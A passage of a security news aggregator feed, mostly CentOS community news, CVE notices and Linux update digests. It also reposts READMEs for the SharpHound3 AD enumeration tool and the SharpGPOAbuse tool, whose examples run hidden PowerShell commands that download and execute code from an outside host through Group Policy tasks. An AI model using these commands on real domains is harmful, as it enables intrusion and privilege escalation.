<p>For the past few years, there have been two separate Twitter accounts for CentOS project news - @CentOS and @CentOSProject - and this has led to some confusion. We're pleased to announce that we've consolidated at <a href="https://twitter.com/centos">@CentOS</a>. If you were already following @CentOSProject, you've been automatically moved over to the @CentOS account. The @CentOSProject account will remain as a placeholder just pointing over to the official account.</p>
<p>Meanwhile, if you were following @CentOS to hear from Karanbir Singh, our long-time project lead, that account has been converted to <a href="https://twitter.com/karanorg">@KaranOrg</a>, where you can follow KB's technical musings and other thoughts around his work and life.</p>
<h2>Board nominations open</h2>
<p>As you may have seen in the April board meeting minutes, two directors have decided not to run for the upcoming board term. Both of these directors - Karsten and Carl - have served on the board for 8 years, and we have appreciated their service and dedication to the project.</p>
<p>That leaves two seats to be filled in the upcoming term. As per our governance documents, the board selects replacement directors. But the community is asked for nominations for these seats. If you're thinking of someone you think would be a good board member, or if you'd like to nominate yourself, please have a look at the <a href="https://www.centos.org/about/governance/director-requirements/">requirements and responsibilities of a director</a>, to see if this is something you (or the proposed candidate) would be willing to commit to. Then, submit your nomination via this <a href="https://forms.gle/U777HHDTkKgkg6Sa6">Google Form</a>. Thanks!</p>
<p>We're excited at the prospect of bringing new members, with new enthusiasm, to the board, even as we say a fond farewell to long-serving directors, and we look forward to your nominations.</p>
<h2>Code of Conduct</h2>
<p>We have been working with the Fedora project to draft a new code of conduct, and this was <a href="https://blog.centos.org/2021/04/code-of-conduct/">announced a few weeks ago</a>. We expect to implement our version of it shortly after Fedora publishes theirs. We intend to take their final version and make necessary edits (ie, replacing 'Fedora' with 'CentOS' and other related changes) and are therefore waiting until they are done with all proposed edits. We welcome your comments on the centos-devel mailing list over the coming weeks as we prepare to make this change.</p>
<h2>Red Hat Summit</h2>
<p>Last week we were at <a href="https://www.redhat.com/en/summit">Red Hat Summit</a>, Red Hat's annual convention. CentOS had a steady stream of visitors in the CentOS/Fedora booth - thank you to all of you who came and talked with us.</p>
<p>There were a couple of sessions specifically about CentOS Stream - two "Ask the expert" sessions where attendees could ask their burning questions around CentOS Stream. These were very similar sessions, presented twice to make them convenient for people in different time zones. These were recorded, and you can watch them now, with free registration on the Summit platform.</p>
<p>CentOS Stream: Building an innovative future for enterprise Linux</p>
<ul><li><a href="https://events.summit.redhat.com/widget/redhat/sum21/sessioncatalog/session/1612985601110001PiOR">Chris, Brian, and Herve</a></li>
<li><a href="https://events.summit.redhat.com/widget/redhat/sum21/sessioncatalog/session/1612985596209001PwQJ">Mike, Gunnar, and Brian</a></li>
</ul><p>If you have further questions about CentOS Stream, we encourage you to bring them to <a href="https://lists.centos.org/mailman/listinfo/centos-devel">the centos-devel mailing list</a>, or any of our <a href="https://wiki.centos.org/Promo/Networks">various social media presences</a>.</p>
<h2>SIG reports</h2>
<p>CentOS Special Interest Groups are smaller efforts around particular topics or technologies, to produce content on top of the base CentOS operating system. This month we have reports from a few of our SIGs.</p>
<h3>Messaging SIG</h3>
<h4>Purpose</h4>
<p>Provide a unique source for messaging related packages. These packages are consumed e.g by the Cloud SIG or the OpsTools SIG.</p>
<h4>Membership Update</h4>
<p>We had talks with the RabbitMQ maintainers to get RabbitMQ packages included and updated.</p>
<h4>Activity</h4>
<p>Other than that, the nature of this SIG is to provide ... for other SIGs. The churn is not as big as in other SIGs.</p>
<h3>Storage SIG</h3>
<h4>Repository Status and Updates</h4>
<p>GlusterFS 9 was released; the glusterfs-9.1 bug fix update is available.</p>
<p>Ceph Pacific/16 was released; the ceph-16.2.1 bug fix update is available (c8 and c8s).</p>
<p>Bug fix updates to NFS-Ganesha (including libntirpc), Ceph Octopus/15, Ceph Nautilus/14 (c7 and c8), and Gluster 8 are available.</p>
<p>Ceph Pacific, GlusterFS 8 and GlusterFS 9, and NFS-Ganesha 3 (including libntirpc) packages are now built for CentOS 8 Stream. The associated release packages for those will land in CentOS 8 Stream soon.</p>
<h4>Group Status and Actions from meeting</h4>
<p>The storage sig meeting is moved to #centos-meeting2</p>
<p>Ceph Pacific is now available and can be consumed by other projects:</p>
<p>The OpenStack TripleO CI now consumes cephadm Pacific for both released and pending content -<br><a href="https://review.opendev.org/q/topic:%22cephadm_pacific%22+(status:open%20OR%20status:merged)">https://review.opendev.org/q/topic:%22cephadm_pacific%22+(status:open%20OR%20status:merged)</a></p>
<h4>Links and other general informations</h4>
<p>Meetings agenda <a href="https://hackmd.io/Epc35JIESaeotoGzwu5R5w">https://hackmd.io/Epc35JIESaeotoGzwu5R5w</a></p>
<p> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Foreman up to 2.4.x FreeIPA Module cleartext transmission]]></title>
<description><![CDATA[A vulnerability was found in Foreman up to 2.4.x (Service Management Software). It has been classified as problematic. This affects an unknown code of the component FreeIPA Module. Upgrading to version 2.5.0 eliminates this vulnerability.]]></description>
<link>https://tsecurity.de/de/1458979/sicherheitsluecken/foreman-up-to-24x-freeipa-module-cleartext-transmission/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1458979/sicherheitsluecken/foreman-up-to-24x-freeipa-module-cleartext-transmission/</guid>
<pubDate>Sun, 02 May 2021 07:31:24 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.foreman">Foreman up to 2.4.x</a> (<a href="https://vuldb.com/?type.service_management_software">Service Management Software</a>). It has been classified as problematic. This affects an unknown code of the component <em>FreeIPA Module</em>. Upgrading to version 2.5.0 eliminates this vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-3494]]></title>
<description><![CDATA[A smart proxy that provides a restful API to various sub-systems of the Foreman is affected by the flaw which can cause a Man-in-the-Middle attack. The FreeIPA module of Foreman smart proxy does not check the SSL certificate, thus, an unauthenticated attacker can perform actions in FreeIPA if cer...]]></description>
<link>https://tsecurity.de/de/1453480/sicherheitsluecken/cve-2021-3494/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1453480/sicherheitsluecken/cve-2021-3494/</guid>
<pubDate>Mon, 26 Apr 2021 22:32:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A smart proxy that provides a restful API to various sub-systems of the Foreman is affected by the flaw which can cause a Man-in-the-Middle attack. The FreeIPA module of Foreman smart proxy does not check the SSL certificate, thus, an unauthenticated attacker can perform actions in FreeIPA if certain conditions are met. The highest threat from this flaw is to system confidentiality. This flaw affects Foreman versions before 2.5.0.]]></content:encoded>
</item>
<item>
<title><![CDATA[SharpHound3 - C# Data Collector For The BloodHound Project]]></title>
<description><![CDATA[Get SharpHound  The latest build of SharpHound will always be in the BloodHound repository here  Compile Instructions  SharpHound is written using C# 9.0 features. To easily compile this project, use Visual Studio 2019.  If you would like to compile on previous versions of Visual Studio, you can ...]]></description>
<link>https://tsecurity.de/de/1429321/it-security-nachrichten/sharphound3-c-data-collector-for-the-bloodhound-project/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1429321/it-security-nachrichten/sharphound3-c-data-collector-for-the-bloodhound-project/</guid>
<pubDate>Sun, 04 Apr 2021 13:00:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-hrWPo7_AjCs/YGKdjYBnN0I/AAAAAAAAVv4/4tQzfDXGIqoygITy4Z15F1O4-2ZcNPb1gCNcBGAsYHQ/s1000/bloodhound.png" imageanchor="1"><img border="0" data-original-height="1000" data-original-width="1000" height="400" src="https://1.bp.blogspot.com/-hrWPo7_AjCs/YGKdjYBnN0I/AAAAAAAAVv4/4tQzfDXGIqoygITy4Z15F1O4-2ZcNPb1gCNcBGAsYHQ/w400-h400/bloodhound.png" width="400"></a></div><p><br></p><span><b>Get SharpHound</b></span><br>  <p>The latest build of SharpHound will always be in the BloodHound repository <a href="https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors" rel="nofollow" target="_blank" title="here">here</a></p>  <br><span><b>Compile Instructions</b></span><br>  <p>SharpHound is written using C# 9.0 features. To easily compile this project, use Visual Studio 2019.</p>  <p>If you would like to compile on previous versions of Visual Studio, you can install the <a href="https://www.nuget.org/packages/Microsoft.Net.Compilers/" rel="nofollow" target="_blank" title="Microsoft.Net.Compilers">Microsoft.Net.Compilers</a> nuget package.</p>  <p>Building the project will generate an executable as well as a PowerShell script that encapsulates the executable. All dependencies are rolled into the binary.</p><span><a name="more"></a></span><div><br></div><span><b>Requirements</b></span><br>  <p>SharpHound is designed targetting .Net 4.5. Sharphound must be run from the context of a domain user, either directly through a logon or through another method such as RUNAS.</p>  <br><span><b>More Information</b></span><br>  <br><span><b>Usage</b></span><br>  <br><b>Enumeration Options</b><br>  <ul>  <li><strong>CollectionMethod</strong> - The collection method to use. This parameter accepts a comma separated list of values. Has the following potential values (Default: Default):  <ul>  <li><strong>Default</strong> - Performs group membership collection, domain trust collection, local group collection, session collection, ACL collection, object property collection, and SPN target collection</li>  <li><strong>Group</strong> - Performs group membership collection</li>  <li><strong>LocalAdmin</strong> - Performs local admin collection</li>  <li><strong>RDP</strong> - Performs <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="Remote Desktop">Remote Desktop</a> Users collection</li>  <li><strong>DCOM</strong> - Performs <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="Distributed">Distributed</a> COM Users collection</li>  <li><strong>PSRemote</strong> - Performs <a href="https://www.kitploit.com/search/label/Remote%20Management" target="_blank" title="Remote Management">Remote Management</a> Users collection</li>  <li><strong>GPOLocalGroup</strong> - Performs local admin collection using <a href="https://www.kitploit.com/search/label/Group%20Policy" target="_blank" title="Group Policy">Group Policy</a> Objects</li>  <li><strong>Session</strong> - Performs session collection</li>  <li><strong>ComputerOnly</strong> - Performs local admin, RDP, DCOM and session collection</li>  <li><strong>LoggedOn</strong> - Performs privileged session collection (requires admin rights on target systems)</li>  <li><strong>Trusts</strong> - Performs domain trust enumeration</li>  <li><strong>ACL</strong> - Performs collection of ACLs</li>  <li><strong>Container</strong> - Performs collection of Containers</li>  <li><strong>DcOnly</strong> - Performs collection using LDAP only. Includes Group, Trusts, ACL, ObjectProps, Container, and GPOLocalGroup.</li>  <li><strong>ObjectProps</strong> - Performs Object Properties collection for properties such as LastLogon or PwdLastSet</li>  <li><strong>All</strong> - Performs all Collection Methods except GPOLocalGroup</li>  </ul>  </li>  <li><strong>Domain</strong> - Search a particular domain. Uses your current domain if null (Default: null)</li>  <li><strong>Stealth</strong> - Performs stealth collection methods. All stealth options are single threaded.</li>  <li><strong>ExcludeDomainControllers</strong> - Excludes domain controllers from <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> (avoids Microsoft ATA flags :) )</li>  <li><strong>ComputerFile</strong> - Specify a file to load computer names/IPs from</li>  <li><strong>LdapFilter</strong> - LDAP Filter to apppend to search</li>  <li><strong>OverrideUserName</strong> - Overrides user name for session enumeration (advanced)</li>  <li><strong>RealDNSName</strong> - Overrides DNS name for API calls</li>  <li><strong>CollectAllProperties</strong> - Collect all string LDAP properties instead of a subset</li>  <li><strong>WindowsOnly</strong> - Limit computer collection to systems with an operating system that matches *Windows*</li>  </ul>  <br><b>Loop Options</b><br>  <ul>  <li><strong>Loop</strong> - Loop computer collections</li>  <li><strong>LoopDuration</strong> - How long to loop for</li>  <li><strong>LoopInterval</strong> - Duration to wait between loops</li>  </ul>  <br><b>Connection Options</b><br>  <ul>  <li><strong>DomainController</strong> - Specify which Domain Controller to connect to (Default: null)</li>  <li><strong>LdapPort</strong> - Specify what port LDAP lives on (Default: 0)</li>  <li><strong>SecureLdap</strong> - Connect to AD using Secure LDAP instead of regular LDAP. Will connect to port 636 by default.</li>  <li><strong>LdapUsername</strong> - Username to connect to LDAP with. Requires the LDAPPassword parameter as well (Default: null)</li>  <li><strong>LdapPassword</strong> - Password for the user to connect to LDAP with. Requires the LDAPUser parameter as well (Default: null)</li>  <li><strong>DisableKerberosSigning</strong> - Disables LDAP encryption. Not recommended.</li>  </ul>  <br><b>Performance Options</b><br>  <ul>  <li><strong>PortScanTimeout</strong> - Specifies the timeout for ping requests in milliseconds (Default: 2000)</li>  <li><strong>SkipPortScan</strong> - Instructs Sharphound to skip ping requests to see if systems are up</li>  <li><strong>Throttle</strong> - Adds a delay after each request to a computer. Value is in milliseconds (Default: 0)</li>  <li><strong>Jitter</strong> - Adds a percentage jitter to throttle. (Default: 0)</li>  </ul>  <br><b>Output Options</b><br>  <ul>  <li><strong>OutputDirectory</strong> - Folder in which to store JSON files (Default: .)</li>  <li><strong>OutputPrefix</strong> - Prefix to add to your JSON files (Default: "")</li>  <li><strong>NoZip</strong> - Don't compress JSON files to the zip file. Leaves JSON files on disk. (Default: false)</li>  <li><strong>EncryptZip</strong> - Add a randomly generated password to the zip file.</li>  <li><strong>ZipFileName</strong> - Specify the name of the zip file</li>  <li><strong>RandomizeFilenames</strong> - Randomize output file names</li>  <li><strong>PrettyJson</strong> - Outputs JSON with indentation on multiple lines to improve readability. Tradeoff is increased file size.</li>  <li><strong>DumpComputerStatus</strong> - Dumps error codes from connecting to computers</li>  </ul>  <br><b>Cache Options</b><br>  <ul>  <li><strong>CacheFileName</strong> - Filename for the Sharphound cache. (Default: .bin)</li>  <li><strong>NoSaveCache</strong> - Don't save the cache file to disk. Without this flag, .bin will be dropped to disk</li>  <li><strong>InvalidateCache</strong> - Invalidate the cache file and build a new cache</li>  </ul>  <br><b>Misc Options</b><br>  <ul>  <li><strong>StatusInterval</strong> - Interval to display progress during enumeration in milliseconds (Default: 30000)</li>  </ul>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/BloodHoundAD/SharpHound3" rel="nofollow" target="_blank" title="Download SharpHound3">Download SharpHound3</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/pvK-QgkYMTg" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO]]></title>
<description><![CDATA[SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.  More details can be found at the following blog post: https://labs.mwrinfosecurity.com/t...]]></description>
<link>https://tsecurity.de/de/1428966/it-security-nachrichten/sharpgpoabuse-tool-to-take-advantage-of-a-users-edit-rights-on-a-group-policy-object-gpo-in-order-to-compromise-the-objects-that-are-controlled-by-that-gpo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1428966/it-security-nachrichten/sharpgpoabuse-tool-to-take-advantage-of-a-users-edit-rights-on-a-group-policy-object-gpo-in-order-to-compromise-the-objects-that-are-controlled-by-that-gpo/</guid>
<pubDate>Sat, 03 Apr 2021 13:00:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-VNnOeix5kmM/YGKcIKN8NjI/AAAAAAAAVvo/ppIS0eBvEhQJy1juxpM9I8obcZ_n9jn5QCNcBGAsYHQ/s750/SharpGPOAbuse.png" imageanchor="1"><img border="0" data-original-height="291" data-original-width="750" height="248" src="https://1.bp.blogspot.com/-VNnOeix5kmM/YGKcIKN8NjI/AAAAAAAAVvo/ppIS0eBvEhQJy1juxpM9I8obcZ_n9jn5QCNcBGAsYHQ/w640-h248/SharpGPOAbuse.png" width="640"></a></div><p><br></p>  <p>SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a <a href="https://www.kitploit.com/search/label/Group%20Policy" target="_blank" title="Group Policy">Group Policy</a> Object (GPO) in order to compromise the objects that are controlled by that GPO.</p>  <p>More details can be found at the following blog post: <a href="https://labs.mwrinfosecurity.com/tools/sharpgpoabuse" rel="nofollow" target="_blank" title="https://labs.mwrinfosecurity.com/tools/sharpgpoabuse">https://labs.mwrinfosecurity.com/tools/sharpgpoabuse</a></p><span><a name="more"></a></span><div><br></div><span><b>Compile Instructions</b></span><br>  <p>Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.</p>  <br><span><b>Usage</b></span><br>  <pre><code>Usage:<br>        SharpGPOAbuse.exe &lt;AttackType&gt; &lt;AttackOptions&gt;<br></code></pre>  <br><span><b>Attack Options</b></span><br>  <br><b>Adding User Rights</b><br>  <pre><code>Options required to add new user rights:<br>--UserRights<br>        Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.<br>--UserAccount<br>        Set the account to add the new rights.<br>--GPOName<br>        The name of the <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> GPO.<br>        <br>Example:<br>        SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"<br></code></pre>  <br><b>Adding a Local Admin</b><br>  <pre><code>Options required to add a new local admin:<br>--UserAccount<br>        Set the name of the account to be added in local admins.<br>--GPOName<br>        The name of the vulnerable GPO.<br><br>Example:<br>        SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"<br></code></pre>  <br><b>Configuring a User or Computer Logon Script</b><br>  <pre><code>Options required to add a new user or computer startup script:<br>--ScriptName<br>        Set the name of the new startup script.<br>--ScriptContents<br>        Set the contents of the new startup script.<br>--GPOName<br>        The name of the vulnerable GPO.<br><br>Example: <br>        SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w <a href="https://www.kitploit.com/search/label/Hidden" target="_blank" title="hidden">hidden</a> -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"<br></code></pre>  <p>If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:</p>  <pre><code>SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==&lt;targetusername&gt; powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"<br></code></pre>  <br><b>Configuring a Computer or User Immediate Task</b><br>  <pre><code>Options required to add a new computer or user immediate task:<br><br>--TaskName<br>        Set the name of the new computer task.<br>--Author<br>        Set the author of the new task (use a DA account).<br>--Command<br>        Command to execute.<br>--Arguments<br>        Arguments passed to the command.<br>--GPOName<br>        The name of the vulnerable GPO.<br><br>Additional User Task Options:<br>--FilterEnabled<br>        Enable Target Filtering for user immediate tasks.<br>--TargetUsername<br>        The user to target. The malicious task will run only on the specified user. Should be in the format &lt;DOMAIN&gt;\&lt;USERNAME&gt;<br>--TargetUserSID<br>        The targeted user's SID.<br><br>Additional Computer Task Options:<br>--FilterEnabled<br>        Enable Target Filtering for computer immediate tasks.<br>--TargetDnsName<br>        The DNS name of the computer to target. The malicious task will run only on the specified host.<br>           <br>Example: <br>        SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"<br></code></pre>  <p>If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:</p>  <pre><code>SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com<br><br></code></pre>  <br><span><b>Additional Options</b></span><br>  <table>  <tr>  <th>Option</th>  <th>Description</th>  </tr>  <tr>  <td>--DomainController</td>  <td>Set the target domain controller</td>  </tr>  <tr>  <td>--Domain</td>  <td>Set the target domain</td>  </tr>  <tr>  <td>--Force</td>  <td>Overwrite existing files if required</td>  </tr>  </table>  <br><span><b>Example Output</b></span><br>  <pre><code>beacon&gt; execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"<br>[*] Tasked <a href="https://www.kitploit.com/search/label/Beacon" target="_blank" title="beacon">beacon</a> to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I<br>EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"<br>[+] host called home, sent: 171553 bytes<br>[+] received output:<br>[+] Domain = europa.com<br>[+] Domain Controller = EURODC01.europa.com<br>[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com<br>[+] GUID of "Default Server Policy" is: {87   7CB769-3543-40C6-A757-F2DF4E5E28BD}<br>[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml<br>[+] versionNumber attribute changed successfully<br>[+] The version number in GPT.ini was increased successfully.<br>[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.<br>[+] Done!<br></code></pre>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/FSecureLABS/SharpGPOAbuse" rel="nofollow" target="_blank" title="Download SharpGPOAbuse">Download SharpGPOAbuse</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/fB1_SUH4I_I" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1400322/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1400322/unix-server/security-preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Fri, 05 Mar 2021 17:46:47 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (389-ds-base, dogtag-pki, dpdk, freeipa, isync, openvswitch, pki-core, and screen), Mageia (bind, chromium-browser-stable, gnome-autoar, jasper, openldap, openssl and compat-openssl10, screen, webkit2, and xpdf), Oracle (grub2), Red Hat (java-1.7.1-ibm,...]]></description>
<link>https://tsecurity.de/de/1400051/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1400051/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 05 Mar 2021 15:00:13 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (389-ds-base, dogtag-pki, dpdk, freeipa, isync, openvswitch, pki-core, and screen), <b>Mageia</b> (bind, chromium-browser-stable, gnome-autoar, jasper, openldap, openssl and compat-openssl10, screen, webkit2, and xpdf), <b>Oracle</b> (grub2), <b>Red Hat</b> (java-1.7.1-ibm, java-1.8.0-ibm, nodejs:10, and nodejs:12), <b>SUSE</b> (freeradius-server), and <b>Ubuntu</b> (wpa).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by Fedora (389-ds-base, dogtag-pki, freeipa, isync, pki-core, and screen), Mageia (firefox, kernel, kernel-linus, libtiff, nonfree-firmware, and thunderbird), Red Hat (bind and java-1.8.0-ibm), Scientific Linux (grub2), and SUSE (kernel-firmware, openldap2, postg...]]></description>
<link>https://tsecurity.de/de/1398807/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1398807/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 04 Mar 2021 15:15:14 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Fedora</b> (389-ds-base, dogtag-pki, freeipa, isync, pki-core, and screen), <b>Mageia</b> (firefox, kernel, kernel-linus, libtiff, nonfree-firmware, and thunderbird), <b>Red Hat</b> (bind and java-1.8.0-ibm), <b>Scientific Linux</b> (grub2), and <b>SUSE</b> (kernel-firmware, openldap2, postgresql12, and python-cryptography).]]></content:encoded>
</item>
<item>
<title><![CDATA[Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1398222/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1398222/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Thu, 04 Mar 2021 07:00:21 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1398223/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1398223/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Thu, 04 Mar 2021 07:00:21 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Preisgabe von Informationen in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1398057/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1398057/it-security-nachrichten/preisgabe-von-informationen-in-freeipa-fedora/</guid>
<pubDate>Wed, 03 Mar 2021 23:30:11 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[CentOS Blog: CentOS Online Dojo, May 13th, 14th, CfP now open]]></title>
<description><![CDATA[TL;DR:

Online Dojo will be held May 13th, 14th, 2021
Dojo CFP open now at forms.gle/wRa8r5ZRHrqnZ6VF6
Closes April 5th, 00:01 UTC

As promised in my email a few weeks ago, we're going to try to do online Dojos quarterly for the coming few quarters, and we're pleased to announce the first of thes...]]></description>
<link>https://tsecurity.de/de/1397856/unix-server/centos-blog-centos-online-dojo-may-13th-14th-cfp-now-open/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1397856/unix-server/centos-blog-centos-online-dojo-may-13th-14th-cfp-now-open/</guid>
<pubDate>Wed, 03 Mar 2021 18:31:50 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TL;DR:</p>
<ul>
<li>Online Dojo will be held May 13th, 14th, 2021</li>
<li>Dojo CFP open now at <a href="https://forms.gle/wRa8r5ZRHrqnZ6VF6">forms.gle/wRa8r5ZRHrqnZ6VF6</a></li>
<li>Closes April 5th, 00:01 UTC</li>
</ul>
<p>As promised in my email a few weeks ago, we're going to try to do online Dojos quarterly for the coming few quarters, and we're pleased to announce the first of these.</p>
<p>We will be holding the event May 13th and 14th, once again using the Hopin platform that we used last time. (Those of you who sent feedback about the platform may like to know that this was all passed on to Hopin, and at least some of it has been addressed since then.)</p>
<p>Details of the event are here: <a href="https://wiki.centos.org/Events/Dojo/May2021">https://wiki.centos.org/Events/Dojo/May2021</a></p>
<p>More details will of course come soon, once we have the online event created.</p>
<p>Registration will be free.</p>
<p>The Call for Presentations (CfP) is now live, at <a href="https://forms.gle/wRa8r5ZRHrqnZ6VF6">forms.gle/wRa8r5ZRHrqnZ6VF6</a></p>
<p>We are looking for presentations about CentOS. This can be CentOS Linux, CentOS Stream, CentOS SIG work, any work in the CentOS community, or any project you're running on top of CentOS distributions.</p>
<p>Attendees of the February event specifically asked for more content about:</p>
<ul>
<li>CentOS Stream</li>
<li>Koji (and similar ways of managing rpm builds)</li>
<li>Creating your own module/package in a personal repo</li>
<li>Gitlab</li>
<li>CentOS Stream contribution flow</li>
<li>FreeIPA</li>
<li>Keycloak</li>
<li>SIG updates</li>
</ul>
<p>Please let me know if you have any further questions, and I hope to see your presentation proposals soon!</p>
<p>--Rich</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anzeige: Containermanagement leicht gemacht mit Openshift]]></title>
<description><![CDATA[Das Onlinetraining der Golem Akademie ebnet den Weg zum Openshift-Cluster. (Applikationen, Cloud Computing)]]></description>
<link>https://tsecurity.de/de/1396021/it-nachrichten/anzeige-containermanagement-leicht-gemacht-mit-openshift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1396021/it-nachrichten/anzeige-containermanagement-leicht-gemacht-mit-openshift/</guid>
<pubDate>Tue, 02 Mar 2021 13:00:51 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
